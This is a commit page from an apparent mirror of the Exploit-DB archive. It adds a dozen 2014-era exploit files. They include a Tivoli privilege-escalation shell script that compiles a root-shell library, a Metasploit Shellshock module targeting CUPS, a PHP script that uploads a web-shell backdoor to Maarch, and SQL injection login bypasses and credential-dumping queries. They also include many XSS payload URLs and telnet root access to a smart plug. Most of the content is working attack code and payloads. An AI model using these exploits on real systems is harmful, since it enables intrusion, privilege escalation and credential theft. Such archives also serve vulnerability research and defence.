bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_31_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-31 04:45:16 +00:00
parent 61f891edbd
commit 63315eaa60
12 changed files with 595 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -31620,3 +31620,14 @@ id,file,description,date,author,platform,type,port
35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0
35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass Vulnerability",2014-10-29,gamehacker,hardware,remote,0
35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross Site Scripting Vulnerability",2010-12-11,MustLive,php,webapps,0
35107,platforms/cfm/webapps/35107.txt,"Mura CMS Multiple Cross Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0
35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 'tags.php' Cross Site Scripting Vulnerability",2010-12-12,TEAMELITE,php,webapps,0
35109,platforms/php/webapps/35109.txt,"PHP TopSites 2.1 'rate.php' Cross Site Scripting and SQL Injection Vulnerabilities",2010-12-13,"c0de Hunters",php,webapps,0
35110,platforms/php/webapps/35110.txt,"BlogCFC 5.9.6.001 Multiple Cross Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",php,webapps,0
35111,platforms/php/webapps/35111.txt,"slickMsg Cross Site Scripting and HTML Injection Vulnerabilities",2010-12-15,"Aliaksandr Hartsuyeu",php,webapps,0
35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80
35114,platforms/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80
35115,platforms/linux/remote/35115.rb,"CUPS Filter Bash Environment Variable Code Injection",2014-10-29,metasploit,linux,remote,631

Can't render this file because it is too large.

70
platforms/cfm/webapps/35107.txt Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/45384/info
Mura CMS is prone to multiple cross-site-scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials; other attacks are also possible.
Mura CMS 5.2.2085 is vulnerable; other versions may also be affected.
1. Cross-site scripting:
http://www.example.com/admin/index.cfm?email="><script>alert(1)</script>&fuseaction=cLogin.main&returnURL=1&status=sendlogin
http://www.example.com/default/error/index.cfm?error.diagnostics="><script>alert(1)</script>
http://www.example.com/admin/date_picker/dsp_dp_showmonth.cfm?+5=posn+1&dateLong="><script>alert(1)</script>
http://www.example.com/admin/date_picker/index.cfm?field="><script>alert(1)</script>
http://www.example.com/Admin/index.cfm?fuseaction=cLogin.main&returnURL=&status=sendlogin&email=<script>alert(1)</script>
http://www.example.com/admin/view/layouts/compact.cfm?fusebox.ajax="><script>alert(1)</script>&
http://www.example.com/admin/view/layouts/template.cfm?fusebox.ajax="><script>alert(1)</script>&myfusebox.originalcircuit=cLogin
http://www.example.com/admin/view/layouts/template.cfm?moduleTitle=</title><body><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_editCreative.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_editIPWhiteList.cfm?attributes.siteid="><script>alert(1)</script>&
http://www.example.com/admin/view/vAdvertising/dsp_editPlacement.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_listAdZones.cfm?attributes.keywords="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_listAdvertisers.cfm?attributes.keywords="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_listCampaigns.cfm?attributes.keywords="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_listCreatives.cfm?attributes.keywords="><script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_viewReportByCampaign.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vAdvertising/dsp_viewReportByPlacement.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vArchitecture/form/dsp_tab_related_content.cfm?attributes.siteid="><script>alert(1)</script>&session.rb=default
http://www.example.com/admin/view/vDashboard/dsp_sessionSearch.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vDashboard/dsp_topContent.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vDashboard/dsp_topRated.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
http://www.example.com/admin/view/vDashboard/dsp_topReferers.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
http://www.example.com/admin/view/vDashboard/dsp_topSearches.cfm?session.dateKey=application.contentManager.getCrumbListrsList.contentid,<script>alert(1)</script>
http://www.example.com/admin/view/vEmail_Broadcaster/dsp_form.cfm?session.dateKey=<script>alert(1)
</script>
http://www.example.com/admin/view/vEmail_Broadcaster/dsp_list.cfm?session.dateKey=<script>alert(1)
</script>
http://www.example.com/admin/view/vExtend/dsp_attribute_form.cfm?attributes.formName=TextBox,TextArea,HTMLEditor,SelectBox,MultiSelectBox,RadioGroup,File,Hidden/"><script>alert(1)
</script>&attributes.action=TextBox,TextArea,HTMLEditor,SelectBox,MultiSelectBox,RadioGroup,File,Hi
dden
http://www.example.com/admin/view/vExtend/dsp_editAttributes.cfm?attributes.extendSetID="><script>alert(1)</script>&attributes.subTypeID=extendSetssattributes.siteid=attributesArraya
http://www.example.com/admin/view/vExtend/dsp_listSets.cfm?attributes.siteid="><script>alert(1)</script>&attributes.subTypeID=extendSetss
http://www.example.com/admin/view/vExtend/dsp_listSubTypes.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vFeed/ajax/dsp_loadSite_old.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vFeed/dsp_list.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vMailingList/dsp_form.cfm?attributes.mlid=1&attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vMailingList/dsp_list_members.cfm?attributes.siteid="><script>alert(1)
</script>
http://www.example.com/admin/view/vPrivateUsers/dsp_group.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vPrivateUsers/dsp_secondary_menu.cfm?attributes.siteid="><script>alert(1)</script>
http://www.example.com/admin/view/vPrivateUsers/dsp_user.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vPrivateUsers/dsp_userprofile.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vPublicUsers/dsp_group.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vPublicUsers/dsp_user.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/admin/view/vSettings/dsp_plugin_form.cfm?session.dateKey=<script>alert(1)</script>
http://www.example.com/default/includes/display_objects/calendar/dsp_dp_showmonth.cfm?dateLong="><script>alert(1)</script>
http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/noxml/view/layout/lay_template.cfm?body="><script>alert(1)</script>
http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/xml/view/display/dsp_hello.cfm?runTime="><script>alert(1)</script>
http://www.example.com/default/includes/display_objects/custom/fuseboxtemplates/xml/view/layout/lay_template.cfm?body="><script>alert(1)</script>
http://www.example.com/default/includes/email/inc_email.cfm?bodyHtml=<script>alert(1)</script>&forward=1&rsEmail.site=pcutest@procheckup.com&
http://www.example.com/default/includes/email/inc_email.cfm?rsEmail.site=</title><body><script>alert(1)</script>
http://www.example.com/default/includes/themes/merced/templates/inc/header.cfm?request.siteid="><script>alert(1)</script>
http://www.example.com/default/includes/themes/merced/templates/inc/ie_conditional_includes.cfm?event.getSite.getAssetPath=1&themePath="><script>alert(1)</script>
http://www.example.com/default/utilities/sendtofriend.cfm?request.siteID=Default&url.link="><script>alert(1)</script>http://www.procheckup.com
http://www.example.com/requirements/mura/geoCoding/index.cfm?
http://www.example.com/wysiwyg/editor/plugins/selectlink/fck_selectlink.cfm?fuseaction=cArch.search&keywords="><script>alert(1)</script>&session.siteid=default
2) URI redirection:
http://www.example.com/admin/index.cfm?fuseaction=cLogin.main&display=login&status=failed&rememberMe=1&contentid=&LinkServID=&returnURL=http://www.example.com

26
platforms/hardware/remote/35103.txt Executable file
View file

@ -0,0 +1,26 @@
-----------------------------------------------------------------------
Konke Smart Plug Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author : gamehacker&zixian
Mail : gh<gh@waloudong.org>&zixian<me@zixian.org>
Date : Oct, 17-2014
Vendor : http://www.kankunit.com/
Link : http://www.kankunit.com/
Version : K
CVE : CVE-2014-7279
Exploit & p0c
_____________
“Konke” is a smart Home Furnishing products (http://www.kankunit.com/) in China, the product has a security vulnerability, an attacker could exploit the vulnerability to obtain equipment management authority.
Konke Smart Plug open 23 port?we can telnet the 23 port?we can get root without password.
1?Scan Konke. you can use nmap scan the 23 port.
2?open cmd telnet Konke's 23 port.
3?now you are the root. it is a openwrt,you can use busybox do everything! you can use "reboot" command to reboot Konke.and so on……
_____________

40
platforms/linux/local/35112.sh Executable file
View file

@ -0,0 +1,40 @@
#!/bin/sh
# Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit
# CVE: CVE-2013-5467
# Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni
# Author: Robert Jaroszuk
# Tested on: RedHat 5, Centos 5
# Vulnerable version: IBM Tivoli Monitoring V6.2.2 (other versions not tested)
#
echo "[+] Tivoli pwner kbbacf1 privilege escalation exploit by Robert Jaroszuk"
echo "[+] Preparing the code..."
cat > kbbacf1-pwn.c << DONE
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>
void __cxa_finalize (void *d) {
return;
}
void __attribute__((constructor)) init() {
setresuid(geteuid(), geteuid(), geteuid());
execl("/bin/sh", (char *)NULL, (char *)NULL);
}
DONE
cat > version << DONE
GLIBC_2.2.5 { };
GLIBC_2.3 { };
GLIBC_2.3.2 { };
GLIBC_PRIVATE { };
DONE
echo "[+] Preparing the code... part2"
/usr/bin/gcc -Wall -fPIC -shared -static-libgcc -Wl,--version-script=version -o libcrypt.so.1 kbbacf1-pwn.c
echo "[+] Cleaning up..."
/bin/rm -f kbbacf1-pwn.c version
echo "[+] Exploiting."
/opt/IBM/ITM/tmaitm6/lx8266/bin/kbbacf1

273
platforms/linux/remote/35115.rb Executable file
View file

@ -0,0 +1,273 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
'Description' => %q{
This module exploits a post-auth code injection in specially crafted
environment variables in Bash, specifically targeting CUPS filters
through the PRINTER_INFO and PRINTER_LOCATION variables by default.
},
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
'lcamtuf', # CVE-2014-6278
'Brendan Coles <bcoles[at]gmail.com>' # msf
],
'References' => [
['CVE', '2014-6271'],
['CVE', '2014-6278'],
['EDB', '34765'],
['URL', 'https://access.redhat.com/articles/1200223'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649']
],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0A\x0D",
'DisableNops' => true
},
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash awk ruby'
},
# Tested:
# - CUPS version 1.4.3 on Ubuntu 10.04 (x86)
# - CUPS version 1.5.3 on Debian 7 (x64)
# - CUPS version 1.6.2 on Fedora 19 (x64)
# - CUPS version 1.7.2 on Ubuntu 14.04 (x64)
'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014',
'License' => MSF_LICENSE
))
register_options([
Opt::RPORT(631),
OptBool.new('SSL', [ true, 'Use SSL', true ]),
OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
], self.class)
end
#
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; $(#{cmd}) & }
end
#
# CVE-2014-6278
#
def cve_2014_6278(cmd)
%{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }}
end
#
# Check credentials
#
def check
@cookie = rand_text_alphanumeric(16)
printer_name = rand_text_alphanumeric(10 + rand(5))
res = add_printer(printer_name, '')
if !res
vprint_error("#{peer} - No response from host")
return Exploit::CheckCode::Unknown
elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/
vprint_status("#{peer} - Found CUPS version #{$1}")
else
print_status("#{peer} - Target is not a CUPS web server")
return Exploit::CheckCode::Safe
end
if res.body =~ /Set Default Options for #{printer_name}/
vprint_good("#{peer} - Added printer successfully")
delete_printer(printer_name)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
vprint_error("#{peer} - Authentication failed")
elsif res.code == 426
vprint_error("#{peer} - SSL required - set SSL true")
end
Exploit::CheckCode::Detected
end
#
# Exploit
#
def exploit
@cookie = rand_text_alphanumeric(16)
printer_name = rand_text_alphanumeric(10 + rand(5))
# Select target CVE
case datastore['CVE']
when 'CVE-2014-6278'
cmd = cve_2014_6278(payload.raw)
else
cmd = cve_2014_6271(payload.raw)
end
# Add a printer containing the payload
# with a CUPS filter pointing to /bin/bash
res = add_printer(printer_name, cmd)
if !res
fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
elsif res.body =~ /Set Default Options for #{printer_name}/
print_good("#{peer} - Added printer successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
else
fail_with(Failure::Unknown, "#{peer} - Could not add printer.")
end
# Add a test page to the print queue.
# The print job triggers execution of the bash filter
# which executes the payload in the environment variables.
res = print_test_page(printer_name)
if !res
fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
elsif res.body =~ /Test page sent; job ID is/
vprint_good("#{peer} - Added test page to printer queue")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
else
fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.")
end
# Delete the printer
res = delete_printer(printer_name)
if !res
fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
elsif res.body =~ /has been deleted successfully/
print_status("#{peer} - Deleted printer '#{printer_name}' successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.")
elsif res.code == 426
vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.")
else
vprint_warning("#{peer} - Could not delete printer '#{printer_name}'")
end
end
#
# Add a printer to CUPS
#
def add_printer(printer_name, cmd)
vprint_status("#{peer} - Adding new printer '#{printer_name}'")
ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd"
ppd_file = <<-EOF
*PPD-Adobe: "4.3"
*%==== General Information Keywords ========================
*FormatVersion: "4.3"
*FileVersion: "1.00"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PCFileName: "#{ppd_name}"
*Manufacturer: "Brother"
*Product: "(Brother MFC-3820CN)"
*1284DeviceID: "MFG:Brother;MDL:MFC-3820CN"
*cupsVersion: 1.1
*cupsManualCopies: False
*cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash"
*cupsModelNumber: #{rand(10) + 1}
*ModelName: "Brother MFC-3820CN"
*ShortNickName: "Brother MFC-3820CN"
*NickName: "Brother MFC-3820CN CUPS v1.1"
*%
*%==== Basic Device Capabilities =============
*LanguageLevel: "3"
*ColorDevice: True
*DefaultColorSpace: RGB
*FileSystem: False
*Throughput: "12"
*LandscapeOrientation: Plus90
*VariablePaperSize: False
*TTRasterizer: Type42
*FreeVM: "1700000"
*DefaultOutputOrder: Reverse
*%==== Media Selection ======================
*OpenUI *PageSize/Media Size: PickOne
*OrderDependency: 18 AnySetup *PageSize
*DefaultPageSize: BrLetter
*PageSize BrA4/A4: "<</PageSize[595 842]/ImagingBBox null>>setpagedevice"
*PageSize BrLetter/Letter: "<</PageSize[612 792]/ImagingBBox null>>setpagedevice"
EOF
pd = Rex::MIME::Message.new
pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}"))
pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid"))
pd.add_part("add-printer", nil, nil, %(form-data; name="OP"))
pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME"))
pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable
pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable
pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI"))
data = pd.to_s
data.strip!
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin'),
'ctype' => "multipart/form-data; boundary=#{pd.bound}",
'data' => data,
'cookie' => "org.cups.sid=#{@cookie};",
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
)
end
#
# Queue a printer test page
#
def print_test_page(printer_name)
vprint_status("#{peer} - Adding test page to printer queue")
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'printers', printer_name),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => "org.cups.sid=#{@cookie}",
'vars_post' => {
'org.cups.sid' => @cookie,
'OP' => 'print-test-page'
}
)
end
#
# Delete a printer
#
def delete_printer(printer_name)
vprint_status("#{peer} - Deleting printer '#{printer_name}'")
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin'),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => "org.cups.sid=#{@cookie}",
'vars_post' => {
'org.cups.sid' => @cookie,
'OP' => 'delete-printer',
'printer_name' => printer_name,
'confirm' => 'Delete Printer'
}
)
end
end

9
platforms/php/webapps/35106.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45374/info
Cetera eCommerce is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Cetera eCommerce version 14.0 is vulnerable; other versions may also be affected.
http://www.example.com/cms/templats/banner.php?bannerId=%3Cscript%3Ealert(document.cookie)%3C/script%3E

9
platforms/php/webapps/35108.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45388/info
MyBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
MyBB 1.6 is vulnerable; other versions may be also be affected.
http://www.example.com/tags.php?tag="><script>alert(String.fromCharCode(88,83,83))</script>

13
platforms/php/webapps/35109.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45389/info
PHP TopSites is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP TopSites 2.1 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x
http://www.example.com/topsites/rate.php?site="'><script>alert('xss')</script>

28
platforms/php/webapps/35110.txt Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/45395/info
BlogCFC is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
BlogCFC 5.9.6.001 is vulnerable; other versions may also be affected.
http://www.example.com/tags/podlayout.cfm?ATTRIBUTES.TITLE=<script>alert(1)</script>&thistag.EXECUTIONMODE=start
http://www.example.com/tags/textarea.cfm?attributes.class=">&lt;/textarea&gt;<script>alert(1)</script>&attributes.fieldname=Procheckup&attributes.style=1&attributes.value=1&
http://www.example.com/includes/pods/subscribe.cfm?errorMessage="><script>alert(1)</script>
http://www.example.com/index.cfm?errorMessage="><script>alert(1)</script>
http://www.example.com/includes/pods/subscribe.cfm?"onmouseover="alert(1);
http://www.example.com/index.cfm?"onmouseover="alert(1);
http://www.example.com/search.cfm?"onmouseover="alert(1);
http://www.example.com/stats.cfm?"onmouseover="alert(1);
http://www.example.com/statsbyyear.cfm?"onmouseover="alert(1);
http://www.example.com/tags/getpods.cfm?"onmouseover="alert(1);

11
platforms/php/webapps/35111.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/45403/info
slickMsg is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
slickMsg 0.7-alpha is vulnerable; other versions may also be affected.
XSS example 1: [size=expression(alert(123))]size[/size]
XSS example 2: [color=expression(alert(456))]blue[/color]
http://www.example.com/vulns/161/exploit.html

78
platforms/php/webapps/35113.php Executable file
View file

@ -0,0 +1,78 @@
/******************************************************
# Exploit Title: Maarch 1.4 Arbitrary file upload
# Google Dork: intext:"Maarch Maerys Archive v2.1 logo"
# Date: 29/10/2014
# Exploit Author: Adrien Thierry
# Exploit Advisory: http://asylum.seraum.com/Security-Alert-GED-ECM-Maarch-Critical-Vulnerabilities.html
# Vendor Homepage: http://maarch.org
# Software Link: http://downloads.sourceforge.net/project/maarch/Maarch%20Entreprise/Maarch-1.4.zip
# Version: Maarch GEC <= 1.4 | Maarch Letterbox <= 2.4
# Tested on: Linux / Windows
******************************************************/
The file "file_to_index.php" is accessible without any authentication to upload a file.
This exploit code is a POC for Maarch Letterbox <= 2.4 and Maarch GEC/GED <= 1.4
Exploit code :
<?php
/* EXPLOIT URL */
$target_url= "http://website.target/apps/maarch_enterprise/";
/* EMPTY FOR OLDS VERSIONS LIKE LETTERBOX 2.3 */
$indexing_path = "indexing_searching/";
/* TARGET UPLOAD FILE */
$target_file = "file_to_index.php";
/* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */
$file = "backdoor.php";
/* NAME, EMPTY WITH LETTERBOX */
$name = "shell";
/* LAUNCHING EXPLOIT */
do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name);
function do_post_request($url, $res, $file, $name)
{
$data = "";
$boundary = "---------------------".substr(md5(rand(0,32000)), 0, 10);
$data .= "--$boundary\n";
$fileContents = file_get_contents($file);
$md5 = md5_file($file);
$ext = pathinfo($file, PATHINFO_EXTENSION);
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
$data .= "Content-Type: text/plain\n";
$data .= "Content-Transfer-Encoding: binary\n\n";
$data .= $fileContents."\n";
$data .= "--$boundary--\n";
$params = array('http' => array(
'method' => 'POST',
'header' => 'Content-Type: multipart/form-data; boundary='.$boundary,
'content' => $data
));
$ctx = stream_context_create($params);
$fp = fopen($url, 'rb', false, $ctx);
if (!$fp)
{
throw new Exception("Erreur !");
}
$response = @stream_get_contents($fp);
if ($response === false)
{
throw new Exception("Erreur !");
}
else
{
echo "file should be here : ";
/* LETTERBOX */
if(count($response) > 1) echo $response;
/* MAARCH ENTERPRISE | GEC */
else echo "<a href='" . $res . "tmp/tmp_file_" . $name . "." . $ext . "'>BACKDOOR<a>";
}
}
?>

27
platforms/php/webapps/35114.txt Executable file
View file

@ -0,0 +1,27 @@
/******************************************************
# Exploit Title: Maarch 1.4 SQL Injection
# Google Dork: intext:"Maarch Maerys Archive v2.1 logo"
# Date: 29/10/2014
# Exploit Author: Adrien Thierry
# Exploit Advisory: http://asylum.seraum.com/Security-Alert-GED-ECM-Maarch-Critical-Vulnerabilities.html
# Vendor Homepage: http://maarch.org
# Software Link: http://downloads.sourceforge.net/project/maarch/Maarch%20Entreprise/Maarch-1.4.zip
# Version: Maarch GEC <= 1.4 | Maarch Letterbox <= 2.4
# Tested on: Linux / Windows
******************************************************/
Maarch GEC <= 1.4 and Maarch Letterbox <= suffer from multiple sql injection vulnerabilities. The worst is at the login page, index.php :
login : superadmin' OR user_id='easy
pass : whatyouwant
You see an sql error, but reload the web page, you are logged in.
To change superadmin pass:
Go to Menu -> Mon Profile
Type your news password twice, an email etc, and click on save. New Sql error (history table, so we don't care), but password is changed.
Clear your cookies, return to application url, enter your new fresh password, it's done.